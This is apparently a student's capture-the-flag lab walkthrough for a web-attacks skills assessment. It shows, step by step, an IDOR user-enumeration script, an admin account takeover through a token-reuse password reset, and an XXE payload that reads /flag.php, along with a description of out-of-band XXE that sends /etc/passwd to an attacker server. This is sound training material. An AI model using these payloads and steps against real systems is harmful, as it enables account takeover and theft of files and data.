WEB ATTACKS
OBJECTIVE: perform a web application penetration test for a software development company and test the latest build of their social networking web application.
Try to escalate your privileges and exploit different vulnerabilities to read the flag at '/flag.php'.
#walk the application with Dev Tools and identify potential vulnerable fields
root@htb:~$ BROWSER > {targetSite:port}
username field: htb-student
password field: Academy_student!
...
* submit the expected user input
* found a password change page /settings.php
#perform source code review to understand how the profiles page work
#identified a script where profiles are handled
root@htb:~$ BROWSER > {targetSite:port}/profile.php > CTRL+U
<script>
$(document).ready(function() {
fetch(`/api.php/user/${$.cookie("uid")}`, {
method: 'GET'
}).then(function(response) {
return response.json();
}).then(function(json) {
$("#full_name").html(json['full_name']);
$("#company").html(json['company']);
});
});
</script>#identify potential IDOR on the /api.php/user/{uid} page
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
username field: htb-student
password field: Academy_student!
...
* submit the expected user input
BURP > Proxy
Request
...
GET /api.php/user/74 HTTP/1.1
Host: 94.237.59.180:34096
Accept: */*
Referer: http://94.237.59.180:34096/profile.php
Cookie: PHPSESSID=t39r96rhoepn03m1vkit9s1t6n; uid=74
BURP > Repeater
Request
...
GET /api.php/user/74 HTTP/1.1 //changing the number from 74 to another value will display other user's profile
Host: 94.237.59.180:34096
Accept: */*
Referer: http://94.237.59.180:34096/profile.php
Cookie: PHPSESSID=t39r96rhoepn03m1vkit9s1t6n; uid=74 //this uid part doesn't seem to do anything
#IDOR found
Response
...
HTTP/1.1 200 OK
Date: Sun, 12 Jan 2025 13:11:29 GMT
Server: Apache/2.4.41 (Ubuntu)
{"uid":"76","username":"d.lubin","full_name":"Deema Lubin","company":"Gorczany - Reilly"}
...#identify users with privileges via enumeration
#perform a manual test for use in an enumeration script
root@oco:~$ curl -G "http://94.237.59.180:34096/api.php/user/76" | grep -i "about" --color=auto
{"uid":"1","username":"s.applewhite","full_name":"Samanta Applewhite","company":"Daniel Inc"}
...
#create an enumeration script
root@oco:~$ nano script.sh
#!/bin/bash
url="94.237.59.180:34096"
for i in {1..10}; do
curl -G "http://$url/api.php/user/$i"
done
root@oco:~$ bash script.sh | grep -i "admin" --color=auto
{"uid":"1","username":"s.applewhite","full_name":"Samanta Applewhite","company":"Daniel Inc"}{"uid":"2","username":"a.sumner","full_name":"Ari Sumner","company":"Friesen Group"}{"uid":"3","username":"j.oshaughnessy","full_name":"Jeevan Oshaughnessy","company":"Jaskolski - Lang"}{"uid":"4","username":"r.trainor","full_name":"Riggs Trainor","company":"Beer, Daugherty and Lang"}{"uid":"5","username":"j.bigelow","full_name":"Jakari Bigelow","company":"Ritchie - Hettinger"}{"uid":"6","username":"k.windsor","full_name":"Kahlan Windsor","company":"Rutherford LLC"}{"uid":"7","username":"w.amador","full_name":"Whitley Amador","company":"Howell and Sons"}{"uid":"8","username":"k.parrett","full_name":"Kristie Parrett","company":"Raynor Inc"}{"uid":"9","username":"g.fetter","full_name":"Guiliana Fetter","company":"Mann - Doyle"}{"uid":"10","username":"h.chaudhry","full_name":"Huxton Chaudhry","company":"Volkman - Satterfield"}{"uid":"11","username":"c.hall","full_name":"Charlotte Hall","company":"Reichel - Tillman"}{"uid":"12","username":"z.mccurdy","full_name":"Zyon Mccurdy","company":"Wintheiser - Altenwerth"}{"uid":"13","username":"p.whitman","full_name":"Paula Whitman","company":"Rath Inc"}{"uid":"14","username":"z.soria","full_name":"Zackery Soria","company":"Altenwerth - Haag"}{"uid":"15","username":"b.moriarty","full_name":"Brandi Moriarty","company":"Veum - Bechtelar"}{"uid":"16","username":"z.burdette","full_name":"Zadie Burdette","company":"Jakubowski, Reichert and Champlin"}{"uid":"17","username":"s.mandujano","full_name":"Sofi Mandujano","company":"Lind - Schiller"}{"uid":"18","username":"e.mohammad","full_name":"Emiyah Mohammad","company":"Jones - Stanton"}{"uid":"19","username":"d.tyndall","full_name":"Dottie Tyndall","company":"Hauck Inc"}{"uid":"20","username":"k.felice","full_name":"Kendalynn Felice","company":"Gislason, Grant and Beatty"}{"uid":"21","username":"r.tseng","full_name":"Rianna Tseng","company":"West - Lakin"}{"uid":"22","username":"k.deleon","full_name":"Kameron Deleon","company":"Muller - Bogisich"}{"uid":"23","username":"r.galloway","full_name":"Raven Galloway","company":"Hermann, Ankunding and Beier"}{"uid":"24","username":"d.lira","full_name":"Demarion Lira","company":"Stoltenberg - Hodkiewicz"}{"uid":"25","username":"m.mcatee","full_name":"Monet Mcatee","company":"Lubowitz, Schoen and Barrows"}{"uid":"26","username":"n.mcfadden","full_name":"Nasir Mcfadden","company":"Crooks - Kub"}{"uid":"27","username":"b.collett","full_name":"Braelyn Collett","company":"Lakin Inc"}{"uid":"28","username":"f.lara","full_name":"Felix Lara","company":"Hayes, Koelpin and Murazik"}{"uid":"29","username":"a.arneson","full_name":"Airam Arneson","company":"Osinski, Sawayn and West"}{"uid":"30","username":"k.wilkerson","full_name":"Kamila Wilkerson","company":"Brown, Willms and Quitzon"}{"uid":"31","username":"a.nations","full_name":"Aadvik Nations","company":"Jakubowski - Medhurst"}{"uid":"32","username":"a.bustillos","full_name":"Anabell Bustillos","company":"Hamill Group"}{"uid":"33","username":"a.zelaya","full_name":"Amani Zelaya","company":"Huel, Kris and Considine"}{"uid":"34","username":"a.mobley","full_name":"Alena Mobley","company":"Bayer - Tromp"}{"uid":"35","username":"j.triplett","full_name":"Javon Triplett","company":"Lehner - Dietrich"}{"uid":"36","username":"b.worthy","full_name":"Brentlee Worthy","company":"Brakus Group"}{"uid":"37","username":"l.hammons","full_name":"Letty Hammons","company":"Bogisich, Purdy and Rogahn"}{"uid":"38","username":"s.mcauley","full_name":"Steel Mcauley","company":"Cummerata and Sons"}{"uid":"39","username":"o.powe","full_name":"Oumou Powe","company":"Parker, Feeney and Buckridge"}{"uid":"40","username":"c.cogan","full_name":"Clarisa Cogan","company":"Rohan, Johnson and Flatley"}{"uid":"41","username":"r.goings","full_name":"Ram Goings","company":"Jacobson, Kertzmann and Jacobi"}{"uid":"42","username":"a.yin","full_name":"Asaad Yin","company":"Leuschke, Klocko and Bruen"}{"uid":"43","username":"j.rosenberger","full_name":"Jean Rosenberger","company":"Morar, Schuster and Johns"}{"uid":"44","username":"p.klein","full_name":"Paul Klein","company":"Kautzer, Connelly and McKenzie"}{"uid":"45","username":"n.cochrane","full_name":"Nehemias Cochrane","company":"Osinski, Haag and Conn"}{"uid":"46","username":"j.rigsby","full_name":"Jalissa Rigsby","company":"Ward - O'Kon"}{"uid":"47","username":"t.fairchild","full_name":"Toni Fairchild","company":"Bergnaum - Stiedemann"}{"uid":"48","username":"k.ambrosio","full_name":"Katai Ambrosio","company":"Borer Inc"}{"uid":"49","username":"m.hunnicutt","full_name":"Marty Hunnicutt","company":"Glover - Russel"}{"uid":"50","username":"r.raby","full_name":"Rafaela Raby","company":"Okuneva - Mayert"}{"uid":"51","username":"a.batres","full_name":"Abir Batres","company":"Rosenbaum LLC"}{"uid":"52","username":"a.corrales","full_name":"Amor Corrales","company":"Administrator"}{"uid":"53","username":"n.downs","full_name":"Nico Downs","company":"Welch, Collier and Gulgowski"}{"uid":"54","username":"d.holcomb","full_name":"Darren Holcomb","company":"Reynolds, Keebler and Lindgren"}{"uid":"55","username":"j.holmberg","full_name":"Jayliana Holmberg","company":"Haag - Douglas"}{"uid":"56","username":"i.durbin","full_name":"Isabell Durbin","company":"Goyette - Mraz"}{"uid":"57","username":"d.mcgee","full_name":"Daisy Mcgee","company":"Rodriguez, Windler and Hartmann"}{"uid":"58","username":"d.jumper","full_name":"Darek Jumper","company":"Kihn, Hickle and Wilderman"}{"uid":"59","username":"e.mckinzie","full_name":"Emre Mckinzie","company":"Heathcote - Bechtelar"}{"uid":"60","username":"c.paz","full_name":"Camron Paz","company":"Bernier, Stamm and Ankunding"}{"uid":"61","username":"s.shiver","full_name":"Siana Shiver","company":"Bernhard, Jerde and Bashirian"}{"uid":"62","username":"a.lankford","full_name":"Ayvah Lankford","company":"Oberbrunner, Wyman and Ledner"}{"uid":"63","username":"k.flint","full_name":"Khalid Flint","company":"Halvorson Inc"}{"uid":"64","username":"r.kozlowski","full_name":"Rome Kozlowski","company":"Lubowitz - Leannon"}{"uid":"65","username":"r.wellman","full_name":"Renesmee Wellman","company":"Bernhard and Sons"}{"uid":"66","username":"e.canady","full_name":"Emrie Canady","company":"Bashirian - Medhurst"}{"uid":"67","username":"r.kwon","full_name":"Roselynn Kwon","company":"Schimmel - Jakubowski"}{"uid":"68","username":"k.zarate","full_name":"Karmen Zarate","company":"Shanahan Group"}{"uid":"69","username":"h.farlow","full_name":"Hisham Farlow","company":"Lockman Group"}{"uid":"70","username":"m.urias","full_name":"Malika Urias","company":"Willms LLC"}{"uid":"71","username":"m.farrington","full_name":"Micaiah Farrington","company":"Legros - Schulist"}{"uid":"72","username":"a.tolman","full_name":"Anand Tolman","company":"Schamberger and Sons"}{"uid":"73","username":"s.nutt","full_name":"Sequoia Nutt","company":"Wiza - Abernathy"}{"uid":"74","username":"htb-student","full_name":"Paolo Perrone","company":"Schaefer Inc"}{"uid":"75","username":"h.ray","full_name":"Harrison Ray","company":"Satterfield, Schultz and Kemmer"}{"uid":"76","username":"d.lubin","full_name":"Deema Lubin","company":"Gorczany - Reilly"}{"uid":"77","username":"t.banner","full_name":"Tierney Banner","company":"Bartoletti - Gaylord"}{"uid":"78","username":"o.bear","full_name":"Olivier Bear","company":"Barton - O'Reilly"}{"uid":"79","username":"c.mathieu","full_name":"Cyril Mathieu","company":"Ebert Group"}{"uid":"80","username":"b.landry","full_name":"Bethany Landry","company":"Kertzmann - Reynolds"}{"uid":"81","username":"k.enoch","full_name":"Kiefer Enoch","company":"Hermiston, Koelpin and Bode"}{"uid":"82","username":"a.kang","full_name":"Allan Kang","company":"Purdy Group"}{"uid":"83","username":"z.hollon","full_name":"Zakhi Hollon","company":"Waelchi Group"}{"uid":"84","username":"r.deboer","full_name":"Randi Deboer","company":"McKenzie Inc"}{"uid":"85","username":"s.reichert","full_name":"Sanaya Reichert","company":"Howell and Sons"}{"uid":"86","username":"r.ewing","full_name":"Remi Ewing","company":"Deckow LLC"}{"uid":"87","username":"b.delatorre","full_name":"Brodie Delatorre","company":"Larkin LLC"}{"uid":"88","username":"e.hagen","full_name":"Eddie Hagen","company":"Murphy - Hansen"}{"uid":"89","username":"m.stock","full_name":"Marcello Stock","company":"Satterfield, Marquardt and Oberbrunner"}{"uid":"90","username":"z.recinos","full_name":"Zian Recinos","company":"Renner and Sons"}{"uid":"91","username":"j.breuer","full_name":"Jabria Breuer","company":"Kulas - Stokes"}{"uid":"92","username":"n.andrus","full_name":"Nazir Andrus","company":"Jakubowski - Price"}{"uid":"93","username":"t.olivarez","full_name":"Teo Olivarez","company":"Rempel, Larson and Zieme"}{"uid":"94","username":"m.player","full_name":"Majd Player","company":"Miller, Wisoky and O'Reilly"}{"uid":"95","username":"o.alverson","full_name":"Ousmane Alverson","company":"Bartell - Gorczany"}{"uid":"96","username":"j.jewett","full_name":"Jazmyne Jewett","company":"Cruickshank, McLaughlin and Barton"}{"uid":"97","username":"b.mccallister","full_name":"Blayne Mccallister","company":"Emmerich and Sons"}{"uid":"98","username":"e.amoroso","full_name":"Ellyn Amoroso","company":"Simonis, Roob and Cassin"}{"uid":"99","username":"j.orcutt","full_name":"Jayana Orcutt","company":"Fritsch, Murray and Reinger"}{"uid":"100","username":"e.harder","full_name":"Ester Harder","company":"Rau Inc"}
...
{"uid":"52","username":"a.corrales","full_name":"Amor Corrales","company":"Administrator"}#identify a way to change the password for the admin account
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port} > Settings
password: {arbitraryValue}
confirm password: {arbitraryValue}
* submit expected input
BURP > Proxy
Request
...
GET /api.php/token/52 HTTP/1.1
Host: 94.237.63.176:42682
Referer: http://94.237.63.176:42682/settings.php
Cookie: PHPSESSID=jkl79tu8srt60aofrnt2fhmkok; uid=52
Response
...
HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 03:06:11 GMT
Server: Apache/2.4.41 (Ubuntu)
{"token":"e51a85fa-17ac-11ec-8e51-e78234eb7b0c"}#change the admin account's password
root@oco:~$ BROWSER > {targetSite:port} > Settings
BURP > Proxy
Request
...
GET /api.php/user/52 HTTP/1.1 //changed from 74 to 52
Host: 94.237.59.180:34096
Accept: */*
Referer: http://94.237.59.180:34096/profile.php
Cookie: PHPSESSID=t39r96rhoepn03m1vkit9s1t6n; uid=74
* Forward the request to access the admin's profile page
- click settings and change the admin's password
- password: {arbitraryValue}
confirm password: {arbitraryValue}
* Submit changed password
Burp > Proxy
Request
...
GET /api.php/token/52 HTTP/1.1
Host: 94.237.63.176:35991
Accept: */*
Referer: http://94.237.63.176:35991/settings.php
Cookie: PHPSESSID=c70sjaufu3p78dusohq9rlech1; uid=74
* Forward request
BURP > Proxy
Request
...
POST /reset.php HTTP/1.1
Host: 94.237.63.176:35991
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://94.237.63.176:35991
Referer: http://94.237.63.176:35991/settings.php
Cookie: PHPSESSID=c70sjaufu3p78dusohq9rlech1; uid=74
uid=74&token=e51a85fa-17ac-11ec-8e51-e78234eb7b0c&password=password
* right-click on this request and select "change request request method"
Burp > Proxy
Request
...
GET /reset.php?uid=52&token=e51a85fa-17ac-11ec-8e51-e78234eb7b0c&password=password HTTP/1.1
Host: 94.237.63.176:35991
Accept: */*
Origin: http://94.237.63.176:35991
Referer: http://94.237.63.176:35991/settings.php
Cookie: PHPSESSID=c70sjaufu3p78dusohq9rlech1; uid=74
Response
...
Password changed successfully
* ensure the uid is 52 and the token used is the admin token id#access the admin profile & takeover the admin's account or set the attacker's profile to admin
root@oco:~$ BROWSER > {targetSite:port}
username: a.corrales
password: password
* submit changed password to access the admin's account
- privilege escalation achieved
#test
BURP > Proxy
Request
...
GET /event.php HTTP/1.1
Host: 94.237.63.176:35991
Referer: http://94.237.63.176:35991/profile.php
Cookie: PHPSESSID=c70sjaufu3p78dusohq9rlech1; uid=52
* submit test
BURP > Proxy
Request
...
POST /addEvent.php HTTP/1.1
Host: 94.237.63.176:35991
Origin: http://94.237.63.176:35991
Referer: http://94.237.63.176:35991/event.php
Cookie: PHPSESSID=c70sjaufu3p78dusohq9rlech1; uid=52
<root>
<name>xxeEvent</name>
<details>xxeEvent</details>
<date>2025-01-15</date>
</root>#identify which elements are being displayed IOT know which elements to inject malicious xml input
#if no elements are displayed, utilize blind xxe injection method
BURP > Repeater
Request
...
POST /addEvent.php HTTP/1.1
Host: 94.237.63.176:35991
Origin: http://94.237.63.176:35991
Referer: http://94.237.63.176:35991/event.php
Cookie: PHPSESSID=c70sjaufu3p78dusohq9rlech1; uid=52
<root>
<name>xxeEvent</name>
<details>xxeEvent</details>
<date>2025-01-15</date>
</root>
Response
...
HTTP/1.1 200 OK
Event '' has been created.
* the name field is reflected in the response and may be vulnerable to xxe injection#test error-based xxe
BURP > Repeater
Request
...
<root>
<name>&nonExistingEntity;</name>
<details>xxeEvent</details>
<date>2025-01-15</date>
</root>
Response
...
HTTP/1.1 200 OK
Event '' has been created.
* no elements are reflected in the response... and no errors are displayed
* if the web application displays an error, it may reveal the web server directory, which can be used to read the source code of other files
* ALT: delete any of the closing tag so, it does not close (e.g. <roo> instead of <root>#execution
#use source code method
BURP > Repeater
Request
...
POST /addEvent.php HTTP/1.1
Host: 94.237.63.176:35991
Origin: http://94.237.63.176:35991
Referer: http://94.237.63.176:35991/event.php
Cookie: PHPSESSID=c70sjaufu3p78dusohq9rlech1; uid=52
<!DOCTYPE email [
<!ENTITY srcCode SYSTEM "php://filter/convert.base64-encode/resource=/flag.php">
]>
<root>
<name>&srcCode;</name>
<details>xxeEvent</details>
<date>2025-01-15</date>
</root>
* Send the request
Response
...
HTTP/1.1 200 OK
Event 'PD9waHAgJGZsYWcgPSAiSFRCe200NTczcl93M2JfNDc3NGNrM3J9IjsgPz4K' has been created.
* step-by-step process
- When the XML parser processes the XML file, it encounters the %file entity and
resolves it to the external resource specified by
php://filter/convert.base64-encode/resource=/etc/passwd.
This means that the attacker is instructing the parser to read the /etc/passwd
file, and the contents of that file will be Base64-encoded.
However, the Base64-encoded content is not directly retrieved by the attacker
yet. It's stored in the %file entity.
- After resolving %file, the %oob entity is processed, which contains the HTTP
request. The attacker’s server (http://OUR_IP:8000/) is contacted with the query
parameter content=%file, which includes the Base64-encoded contents of the
/etc/passwd file. The XML parser triggers the HTTP request to the attacker's
server, and the encoded contents of /etc/passwd are sent to the attacker's
server as the content parameter in the URL.
root@oco:~$ echo -n "PD9waHAgJGZsYWcgPSAiSFRCe200NTczcl93M2JfNDc3NGNrM3J9IjsgPz4K" | base64 -d
* <?php $flag = "HTB{m4573r_w3b_4774ck3r}"; ?>Last updated